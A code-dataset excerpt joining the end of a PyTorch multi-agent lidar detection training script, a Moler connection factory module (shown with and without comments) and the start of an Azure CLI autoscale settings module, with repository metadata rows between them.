padded_voxel_points_list_teacher = [padded_voxel_points_teacher0, padded_voxel_points_teacher1, padded_voxel_points_teacher2, padded_voxel_points_teacher3, padded_voxel_points_teacher4]
padded_voxel_points_teacher = torch.cat(tuple(padded_voxel_points_list_teacher), 0)
data['bev_seq_teacher'] = padded_voxel_points_teacher.to(device)
data['kd_weight'] = args.kd
data['layer'] = layer
if config.KD:
loss, cls_loss, loc_loss,kd_loss = fafmodule.step(data, batch_size, center_agent)
else:
loss, cls_loss, loc_loss = fafmodule.step(data, batch_size, center_agent, forcast_num)
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
time_10 = time.time()
print("total_time:", time_10 - time_9)
step_ct += 1
print("\nEpoch {}, Step {}".format(epoch, step_ct))
print("Running total loss: {}".format(running_loss_disp.avg))
print("Running total cls loss: {}".format(running_loss_class.avg))
print("Running total loc loss: {}".format(running_loss_loc.avg))
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
if need_log:
if config.KD:
saver.write("{}\t{}\t{}\tkd loss:{} Take {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,kd_loss,str(time.time()-t)))
else:
saver.write("{}\t{}\t{}\tTake {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,str(time.time()-t)))
saver.flush()
if config.MGDA:
save_dict = {'epoch': epoch,
'encoder_state_dict': fafmodule.encoder.state_dict(),
'optimizer_encoder_state_dict': fafmodule.optimizer_encoder.state_dict(),
'scheduler_encoder_state_dict': fafmodule.scheduler_encoder.state_dict(),
'head_state_dict': fafmodule.head.state_dict(),
'optimizer_head_state_dict': fafmodule.optimizer_head.state_dict(),
'scheduler_head_state_dict': fafmodule.scheduler_head.state_dict(),
'loss': running_loss_disp.avg}
else:
save_dict = {'epoch': epoch,
'model_state_dict': fafmodule.model.state_dict(),
'optimizer_state_dict': fafmodule.optimizer.state_dict(),
'scheduler_state_dict': fafmodule.scheduler.state_dict(),
'loss': running_loss_disp.avg}
torch.save(save_dict, os.path.join(model_save_path, 'epoch_' + str(epoch) + '.pth'))
elif args.mode == 'val':
if config.MGDA:
fafmodule.encoder.eval()
fafmodule.head.eval()
else:
fafmodule.model.eval()
running_loss_disp = AverageMeter('Total loss', ':.6f')
running_loss_class = AverageMeter('classification Loss', ':.6f')
running_loss_loc = AverageMeter('Localization Loss', ':.6f')
det_results_local = [[] for i in range(5)]
annotations_local = [[] for i in range(5)]
for sample in valloader:
t = time.time()
center_agent = sample['center_agent']
padded_voxel_points0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, gt_max_iou0, filename0, \
target_agent_id0, num_sensor0, trans_matrices0, padded_voxel_points_global, reg_target_global, anchors_map_global, gt_max_iou_global, trans_matrices_map = sample[0]['padded_voxel_points'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'], sample[0]['gt_max_iou'], sample[0]['filename'], sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'],sample[0]['padded_voxel_points_global'],sample[0]['reg_target_global'],sample[0]['anchors_map_global'],sample[0]['gt_max_iou_global'],sample[0]['trans_matrices_map']
padded_voxel_points1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, gt_max_iou1, filename1, target_agent_id1, num_sensor1, trans_matrices1, _, _, _, _, _ = sample[1]['padded_voxel_points'], sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'], sample[1]['gt_max_iou'], sample[1]['filename'], sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'],sample[1]['padded_voxel_points_global'],sample[1]['reg_target_global'],sample[1]['anchors_map_global'],sample[1]['gt_max_iou_global'],sample[1]['trans_matrices_map']
padded_voxel_points2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, gt_max_iou2, filename2, target_agent_id2, num_sensor2, trans_matrices2, _, _, _, _, _ = sample[2]['padded_voxel_points'], sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'], sample[2]['gt_max_iou'], sample[2]['filename'], sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'],sample[2]['padded_voxel_points_global'],sample[2]['reg_target_global'],sample[2]['anchors_map_global'],sample[2]['gt_max_iou_global'],sample[2]['trans_matrices_map']
padded_voxel_points3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, gt_max_iou3, filename3, target_agent_id3, num_sensor3, trans_matrices3, _, _, _, _, _ = sample[3]['padded_voxel_points'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'], sample[3]['gt_max_iou'], sample[3]['filename'], sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'],sample[3]['padded_voxel_points_global'],sample[3]['reg_target_global'],sample[3]['anchors_map_global'],sample[3]['gt_max_iou_global'],sample[3]['trans_matrices_map']
padded_voxel_points4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, gt_max_iou4, filename4, target_agent_id4, num_sensor4, trans_matrices4, _, _, _, _, _ = sample[4]['padded_voxel_points'],sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'], sample[4]['gt_max_iou'], sample[4]['filename'], sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'],sample[4]['padded_voxel_points_global'],sample[4]['reg_target_global'],sample[4]['anchors_map_global'],sample[4]['gt_max_iou_global'],sample[4]['trans_matrices_map']
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2,
padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
gt_max_iou = [gt_max_iou0, gt_max_iou1, gt_max_iou2, gt_max_iou3, gt_max_iou4]
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3,
target_agent_id4]
num_agent_list = [num_sensor0, num_sensor1, num_sensor2, num_sensor3, num_sensor4]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1)
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
data = {}
data['bev_seq'] = padded_voxel_points.to(device)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['vis_maps'] = vis_maps.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
loss, cls_loss, loc_loss, result = fafmodule.predict_all(data, 1, True, center_agent)
for k in range(num_sensor0):
data_agents = {}
data_agents['bev_seq'] = torch.unsqueeze(padded_voxel_points[k, :, :, :, :], 1)
data_agents['reg_targets'] = torch.unsqueeze(reg_target[k, :, :, :, :, :], 0)
data_agents['anchors'] = torch.unsqueeze(anchors_map[k, :, :, :, :], 0)
temp = gt_max_iou[k]
data_agents['gt_max_iou'] = temp[0]['gt_box'][0, :, :]
result_temp = result[k]
temp = {'bev_seq': data_agents['bev_seq'][0, -1].cpu().numpy(), 'result': result_temp[0][0],
'reg_targets': data_agents['reg_targets'].cpu().numpy()[0],
'anchors_map': data_agents['anchors'].cpu().numpy()[0],
'gt_max_iou': data_agents['gt_max_iou']}
det_results_local[k], annotations_local[k] = cal_local_mAP(config, temp, det_results_local[k],
annotations_local[k])
filename = str(filename0[0][0])
cut = filename[filename.rfind('agent') + 7:]
seq_name = cut[:cut.rfind('_')]
idx = cut[cut.rfind('_') + 1:cut.rfind('/')]
idx_save = str(idx) + '.png'
print("Validation scene {}, at frame {}".format(seq_name, idx))
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
print("Quantitative evaluation results of model from {}, at epoch {}".format(args.resume, start_epoch - 1))
log_results_file = args.logname + '.txt'
saver_val = open(log_results_file,'w')
det_results_all_local = det_results_local[0] + det_results_local[1] + det_results_local[2] + det_results_local[3]
annotations_all_local = annotations_local[0] + annotations_local[1] + annotations_local[2] + annotations_local[3]
saver_val.write('\noverall local results@iou0.5\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
saver_val.write('\noverall local results@iou0.7\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
for k in range(4):
saver_val.write('\nlocal{} results@iou0.5\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
saver_val.write('\nlocal{} results@iou0.7\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
else:
print('Not implemented yet.')
if need_log:
saver.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default=None, type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('--resume', default='', type=str, help='The path to the saved model that is loaded to resume training')
parser.add_argument('--resume_teacher', default='/DATA_SSD/slren/teacher_aug_batch_4_epoch_100.pth', type=str, help='The path to the saved teacher model that is loaded to resume training')
parser.add_argument('--kd', default=100000, type=float, help='kd_weight')
parser.add_argument('--model_only', action='store_true', help='only load model')
parser.add_argument('--batch', default=2, type=int, help='Batch size')
parser.add_argument('--nepoch', default=100, type=int, help='Number of epochs')
parser.add_argument('--layer', default=3, type=int, help='Communicate which layer')
parser.add_argument('--nworker', default=0, type=int, help='Number of workers')
parser.add_argument('--lr', default=0.001, type=float, help='Initial learning rate')
parser.add_argument('--log', action='store_true', help='Whether to log')
parser.add_argument('--logpath', default='./log', help='The path to the output log file')
parser.add_argument('--mode', default=None, help='Train/Val mode')
parser.add_argument('--visualization', default=True, help='Visualize validation result')
parser.add_argument('--binary', default=True, type=bool, help='Only detect car')
parser.add_argument('--only_det', default=True, type=bool, help='Only do detection')
parser.add_argument('--logname', default=None, type=str, help='log the detection performance')
parser.add_argument('--forcast_num', default=4, type=int, help='How many frames do you want to use in forcast')
parser.add_argument('--rank', default=0, type=int, help='node rank for distributed training')
parser.add_argument('--ngpus_per_node', default=2, type=int)
parser.add_argument('--gpu', default=2, type=int, help='GPU id to use.')
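    # A minimal, purely illustrative invocation of this script (the script file name and
    # the data path below are hypothetical placeholders; only the flags defined above are real):
    #
    #   python train_mimo_kd.py -d /path/to/preprocessed_bev --mode train --batch 2 \
    #       --nepoch 100 --layer 3 --kd 100000 --log --logpath ./log --logname run1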
torch.multiprocessing.set_sharing_strategy('file_system')
args = parser.parse_args()
print(args)
config = Config('train', binary=args.binary, only_det=args.only_det)
config_global = ConfigGlobal('train', binary=args.binary, only_det=args.only_det)
main(config, config_global, args)
| true
| true
|
1c3ea3db82bc9ca8412c76aa081720e97c4c8d00
| 8,617
|
py
|
Python
|
moler/connection_factory.py
|
AdamKlekowski/moler
|
9d032bad402d9863685b2a8624320566512c14cc
|
[
"BSD-3-Clause"
] | 2
|
2021-03-14T15:17:10.000Z
|
2021-03-15T07:12:12.000Z
|
moler/connection_factory.py
|
Laymer/moler
|
2d7b89efdc2ca5e9975112b97934b396e24b5505
|
[
"BSD-3-Clause"
] | null | null | null |
moler/connection_factory.py
|
Laymer/moler
|
2d7b89efdc2ca5e9975112b97934b396e24b5505
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
One of Moler's goals is to be IO-agnostic.
So it can be used under twisted, asyncio, curio and any other IO system.
Moler's connection is a very thin layer binding Moler's ConnectionObserver with an external IO system.
Connection responsibilities:
- have a means for sending outgoing data via external IO
- have a means for receiving incoming data from external IO
- perform data encoding/decoding to let external IO use pure bytes
- have a means allowing multiple observers to get its received data (data dispatching)
"""
__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'
import logging
import platform
import moler.config.connections as connection_cfg
from moler.threaded_moler_connection import ThreadedMolerConnection
def get_connection(name=None, io_type=None, variant=None, **constructor_kwargs):
"""
Return connection instance of given io_type/variant
:param name: name of connection defined in configuration
:param io_type: 'tcp', 'memory', 'ssh', ...
:param variant: implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
:param constructor_kwargs: arguments specific for given io_type
:return: requested connection
You may provide either 'name' or 'io_type' but not both.
If you provide 'name' then it is searched inside configuration
to find io_type and constructor_kwargs assigned to that name.
If variant is not given then it is taken from configuration.
"""
if (not name) and (not io_type):
err_msg = "Provide either 'name' or 'io_type' parameter (none given)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
if name and io_type:
err_msg = "Use either 'name' or 'io_type' parameter (not both)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
io_type, constructor_kwargs = _try_take_named_connection_params(name, io_type, **constructor_kwargs)
variant = _try_select_io_type_variant(io_type, variant)
io_conn = _try_get_connection_with_name(io_type, variant, **constructor_kwargs)
return io_conn
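# A minimal usage sketch for get_connection() (illustrative only: the host/port values and
# the 'my_tcp' configuration name are assumptions, not defined anywhere in this module):
#
#   from moler.connection_factory import get_connection
#
#   # request a connection directly by io_type/variant ...
#   conn = get_connection(io_type='tcp', variant='threaded', host='localhost', port=2345)
#   # ... or by a name previously defined in moler.config.connections
#   conn = get_connection(name='my_tcp')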
class ConnectionFactory(object):
"""
ConnectionFactory creates plugin-system: external code can register
"construction recipe" that will be used to create specific connection.
"Construction recipe" means: class to be used or any other callable that can
produce instance of connection.
Specific means type/variant pair.
Type is: memory, tcp, udp, ssh, ...
Variant is: threaded, asyncio, twisted, ...
Connection means here: external-IO-connection + moler-connection.
    In other words - a fully operable connection doing IO and data dispatching,
ready to be used by ConnectionObserver.
ConnectionFactory responsibilities:
- register "recipe" how to build given type/variant of connection
- return connection instance created via utilizing registered "recipe"
"""
_constructors_registry = {}
@classmethod
def register_construction(cls, io_type, variant, constructor):
"""
Register constructor that will return "connection construction recipe"
:param io_type: 'tcp', 'memory', 'ssh', ...
:param variant: implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
:param constructor: callable building connection object
:return: None
"""
if not callable(constructor):
err_msg = "constructor must be callable not {}".format(constructor)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise ValueError(err_msg)
cls._constructors_registry[(io_type, variant)] = constructor
@classmethod
def get_connection(cls, io_type, variant, **constructor_kwargs):
"""
Return connection instance of given io_type/variant
:param io_type: 'tcp', 'memory', 'ssh', ...
:param variant: implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
:param constructor_kwargs: arguments specific for given io_type
:return: requested connection
"""
key = (io_type, variant)
if key not in cls._constructors_registry:
err_msg = "No constructor registered for [{}] connection".format(key)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
constructor = cls._constructors_registry[key]
connection = constructor(**constructor_kwargs)
# TODO: enhance error reporting:
# not giving port for tcp connection results in not helpful:
# TypeError: tcp_thd_conn() takes at least 1 argument (1 given)
# try to use funcsigs.signature to give more detailed missing-param
return connection
@classmethod
def available_variants(cls, io_type):
"""
Return variants available for given io_type
:param io_type: 'tcp', 'memory', 'ssh', ...
:return: list of variants, ex. ['threaded', 'twisted']
"""
available = [vt for io, vt in cls._constructors_registry if io == io_type]
return available
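# A small sketch of the plugin mechanism described in the class docstring above
# (DummyConnection and the 'memory'/'dummy' pair are made up for illustration):
#
#   class DummyConnection(object):
#       def __init__(self, **kwargs):
#           self.kwargs = kwargs
#
#   ConnectionFactory.register_construction(io_type='memory', variant='dummy',
#                                           constructor=DummyConnection)
#   conn = ConnectionFactory.get_connection(io_type='memory', variant='dummy')
#   assert 'dummy' in ConnectionFactory.available_variants('memory')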
def _moler_logger_log(level, msg):
logger = logging.getLogger('moler')
logger.log(level, msg)
def _try_take_named_connection_params(name, io_type, **constructor_kwargs):
if name:
if name not in connection_cfg.named_connections:
whats_wrong = "was not defined inside configuration"
err_msg = "Connection named '{}' {}".format(name, whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
org_kwargs = constructor_kwargs
io_type, constructor_kwargs = connection_cfg.named_connections[name]
# assume connection constructor allows 'name' parameter
constructor_kwargs['name'] = name
# update with kwargs directly passed and not present in named_connections
for argname in org_kwargs:
if argname not in constructor_kwargs:
constructor_kwargs[argname] = org_kwargs[argname]
        # TODO: shall we overwrite named_connections kwargs with the ones from org_kwargs ???
return io_type, constructor_kwargs
def _try_select_io_type_variant(io_type, variant):
if (io_type == 'terminal') and (platform.system() == 'Windows'): # TODO: fix if we will have win implementation of terminal
whats_wrong = "No '{}' connection available on Windows".format(io_type)
fix = "try using 'sshshell' connection instead"
err_msg = "{} ({})".format(whats_wrong, fix)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AttributeError(err_msg)
if variant is None:
if io_type in connection_cfg.default_variant:
variant = connection_cfg.default_variant[io_type]
if variant is None:
whats_wrong = "No variant selected"
selection_method = "directly or via configuration"
err_msg = "{} ({}) for '{}' connection".format(whats_wrong,
selection_method,
io_type)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
if variant not in ConnectionFactory.available_variants(io_type):
whats_wrong = "is not registered inside ConnectionFactory"
err_msg = "'{}' variant of '{}' connection {}".format(variant,
io_type,
whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
return variant
def _try_get_connection_with_name(io_type, variant, **constructor_kwargs):
try:
return ConnectionFactory.get_connection(io_type, variant, **constructor_kwargs)
except TypeError as err:
if "unexpected keyword argument 'name'" in str(err):
# 'name' parameter not allowed in connection constructor
del constructor_kwargs['name']
return ConnectionFactory.get_connection(io_type, variant,
**constructor_kwargs)
_moler_logger_log(level=logging.DEBUG, msg=repr(err))
raise
# actions during import
connection_cfg.register_builtin_connections(ConnectionFactory, ThreadedMolerConnection)
connection_cfg.set_defaults()
| 43.520202
| 128
| 0.678542
|
__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'
import logging
import platform
import moler.config.connections as connection_cfg
from moler.threaded_moler_connection import ThreadedMolerConnection
def get_connection(name=None, io_type=None, variant=None, **constructor_kwargs):
if (not name) and (not io_type):
err_msg = "Provide either 'name' or 'io_type' parameter (none given)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
if name and io_type:
err_msg = "Use either 'name' or 'io_type' parameter (not both)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
io_type, constructor_kwargs = _try_take_named_connection_params(name, io_type, **constructor_kwargs)
variant = _try_select_io_type_variant(io_type, variant)
io_conn = _try_get_connection_with_name(io_type, variant, **constructor_kwargs)
return io_conn
class ConnectionFactory(object):
_constructors_registry = {}
@classmethod
def register_construction(cls, io_type, variant, constructor):
if not callable(constructor):
err_msg = "constructor must be callable not {}".format(constructor)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise ValueError(err_msg)
cls._constructors_registry[(io_type, variant)] = constructor
@classmethod
def get_connection(cls, io_type, variant, **constructor_kwargs):
key = (io_type, variant)
if key not in cls._constructors_registry:
err_msg = "No constructor registered for [{}] connection".format(key)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
constructor = cls._constructors_registry[key]
connection = constructor(**constructor_kwargs)
return connection
@classmethod
def available_variants(cls, io_type):
available = [vt for io, vt in cls._constructors_registry if io == io_type]
return available
def _moler_logger_log(level, msg):
logger = logging.getLogger('moler')
logger.log(level, msg)
def _try_take_named_connection_params(name, io_type, **constructor_kwargs):
if name:
if name not in connection_cfg.named_connections:
whats_wrong = "was not defined inside configuration"
err_msg = "Connection named '{}' {}".format(name, whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
org_kwargs = constructor_kwargs
io_type, constructor_kwargs = connection_cfg.named_connections[name]
constructor_kwargs['name'] = name
for argname in org_kwargs:
if argname not in constructor_kwargs:
constructor_kwargs[argname] = org_kwargs[argname]
return io_type, constructor_kwargs
def _try_select_io_type_variant(io_type, variant):
if (io_type == 'terminal') and (platform.system() == 'Windows'):
whats_wrong = "No '{}' connection available on Windows".format(io_type)
fix = "try using 'sshshell' connection instead"
err_msg = "{} ({})".format(whats_wrong, fix)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AttributeError(err_msg)
if variant is None:
if io_type in connection_cfg.default_variant:
variant = connection_cfg.default_variant[io_type]
if variant is None:
whats_wrong = "No variant selected"
selection_method = "directly or via configuration"
err_msg = "{} ({}) for '{}' connection".format(whats_wrong,
selection_method,
io_type)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
if variant not in ConnectionFactory.available_variants(io_type):
whats_wrong = "is not registered inside ConnectionFactory"
err_msg = "'{}' variant of '{}' connection {}".format(variant,
io_type,
whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
return variant
def _try_get_connection_with_name(io_type, variant, **constructor_kwargs):
try:
return ConnectionFactory.get_connection(io_type, variant, **constructor_kwargs)
except TypeError as err:
if "unexpected keyword argument 'name'" in str(err):
del constructor_kwargs['name']
return ConnectionFactory.get_connection(io_type, variant,
**constructor_kwargs)
_moler_logger_log(level=logging.DEBUG, msg=repr(err))
raise
connection_cfg.register_builtin_connections(ConnectionFactory, ThreadedMolerConnection)
connection_cfg.set_defaults()
| true
| true
|
1c3ea5491a186402e9d7e441587dc01568439264
| 16,337
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/monitor/operations/autoscale_settings.py
|
digimaun/azure-cli
|
298994660f0fde6863cb45a7c3142141ed10f923
|
[
"MIT"
] | 1
|
2020-12-12T02:53:24.000Z
|
2020-12-12T02:53:24.000Z
|
src/azure-cli/azure/cli/command_modules/monitor/operations/autoscale_settings.py
|
digimaun/azure-cli
|
298994660f0fde6863cb45a7c3142141ed10f923
|
[
"MIT"
] | 1
|
2021-03-01T19:31:38.000Z
|
2021-03-01T19:31:38.000Z
|
src/azure-cli/azure/cli/command_modules/monitor/operations/autoscale_settings.py
|
digimaun/azure-cli
|
298994660f0fde6863cb45a7c3142141ed10f923
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.log import get_logger
logger = get_logger(__name__)
DEFAULT_PROFILE_NAME = 'default'
def scaffold_autoscale_settings_parameters(client): # pylint: disable=unused-argument
"""Scaffold fully formed autoscale-settings' parameters as json template """
import os.path
from knack.util import CLIError
from azure.cli.core.util import get_file_json
# Autoscale settings parameter scaffold file path
curr_dir = os.path.dirname(os.path.realpath(__file__))
autoscale_settings_parameter_file_path = os.path.join(
curr_dir, 'autoscale-parameters-template.json')
if not os.path.exists(autoscale_settings_parameter_file_path):
raise CLIError('File {} not found.'.format(autoscale_settings_parameter_file_path))
return get_file_json(autoscale_settings_parameter_file_path)
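# A minimal sketch of how the scaffold above can be consumed (illustrative only; the
# client argument is unused by the function itself):
#
#   import json
#   template = scaffold_autoscale_settings_parameters(client=None)
#   print(json.dumps(template, indent=2))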
# pylint: disable=too-many-locals
def autoscale_create(client, resource, count, autoscale_name=None, resource_group_name=None,
min_count=None, max_count=None, location=None, tags=None, disabled=None,
actions=None, email_administrator=None, email_coadministrators=None):
from azure.mgmt.monitor.models import (
AutoscaleSettingResource, AutoscaleProfile, AutoscaleNotification, ScaleCapacity,
EmailNotification, WebhookNotification)
if not autoscale_name:
from msrestazure.tools import parse_resource_id
autoscale_name = parse_resource_id(resource)['name']
min_count = min_count or count
max_count = max_count or count
default_profile = AutoscaleProfile(
name=DEFAULT_PROFILE_NAME,
capacity=ScaleCapacity(default=count, minimum=min_count, maximum=max_count),
rules=[]
)
notification = AutoscaleNotification(
email=EmailNotification(
custom_emails=[],
send_to_subscription_administrator=email_administrator,
send_to_subscription_co_administrators=email_coadministrators
),
webhooks=[]
)
for action in actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
autoscale = AutoscaleSettingResource(
location=location,
profiles=[default_profile],
tags=tags,
notifications=[notification],
enabled=not disabled,
autoscale_setting_resource_name=autoscale_name,
target_resource_uri=resource
)
if not (min_count == count and max_count == count):
logger.warning('Follow up with `az monitor autoscale rule create` to add scaling rules.')
return client.create_or_update(resource_group_name, autoscale_name, autoscale)
# pylint: disable=too-many-locals
def autoscale_update(instance, count=None, min_count=None, max_count=None, tags=None, enabled=None,
add_actions=None, remove_actions=None, email_administrator=None,
email_coadministrators=None):
import json
from azure.mgmt.monitor.models import EmailNotification, WebhookNotification
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
if tags is not None:
instance.tags = tags
if enabled is not None:
instance.enabled = enabled
if any([count, min_count, max_count]):
# resolve the interrelated aspects of capacity
default_profile, _ = build_autoscale_profile(instance)
curr_count = default_profile.capacity.default
curr_min = default_profile.capacity.minimum
curr_max = default_profile.capacity.maximum
is_fixed_count = curr_count == curr_min and curr_count == curr_max
# check for special case where count is used to indicate fixed value and only
# count is updated
if count is not None and is_fixed_count and min_count is None and max_count is None:
min_count = count
max_count = count
count = curr_count if count is None else count
min_count = curr_min if min_count is None else min_count
max_count = curr_max if max_count is None else max_count
# There may be multiple "default" profiles. All need to updated.
for profile in instance.profiles:
if profile.fixed_date:
continue
if profile.recurrence:
try:
# portal denotes the "default" pairs by using a JSON string for their name
# so if it can be decoded, we know this is a default profile
json.loads(profile.name)
except ValueError:
continue
profile.capacity.default = count
profile.capacity.minimum = min_count
profile.capacity.maximum = max_count
if not instance.notifications:
return instance
notification = next(x for x in instance.notifications if x.operation.lower() == 'scale')
# process removals
if remove_actions is not None:
removed_emails, removed_webhooks = _parse_action_removals(remove_actions)
notification.email.custom_emails = \
[x for x in notification.email.custom_emails if x not in removed_emails]
notification.webhooks = \
[x for x in notification.webhooks if x.service_uri not in removed_webhooks]
# process additions
for action in add_actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
if email_administrator is not None:
notification.email.send_to_subscription_administrator = email_administrator
if email_coadministrators is not None:
notification.email.send_to_subscription_co_administrators = email_coadministrators
return instance
def _parse_action_removals(actions):
""" Separates the combined list of keys to remove into webhooks and emails. """
flattened = list({x for sublist in actions for x in sublist})
emails = []
webhooks = []
for item in flattened:
if item.startswith('http://') or item.startswith('https://'):
webhooks.append(item)
else:
emails.append(item)
return emails, webhooks
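# Illustrative example of the split performed above (hypothetical values; the output
# order is not guaranteed because the input is de-duplicated through a set):
#
#   emails, webhooks = _parse_action_removals(
#       [['admin@contoso.com', 'https://hooks.example.com/a'], ['ops@contoso.com']])
#   # emails   -> ['admin@contoso.com', 'ops@contoso.com']  (in some order)
#   # webhooks -> ['https://hooks.example.com/a']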
def _apply_copy_rules(autoscale_settings, new_profile, copy_rules):
if copy_rules:
copy_profile = next(x for x in autoscale_settings.profiles if x.name == copy_rules)
if copy_profile:
new_profile.rules = copy_profile.rules[:]
def _create_fixed_profile(autoscale_settings, profile_name, start, end, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import AutoscaleProfile, TimeWindow
if not (start and end):
from knack.util import CLIError
raise CLIError('usage error: fixed schedule: --start DATETIME --end DATETIME')
profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
fixed_date=TimeWindow(start=start, end=end, time_zone=timezone),
)
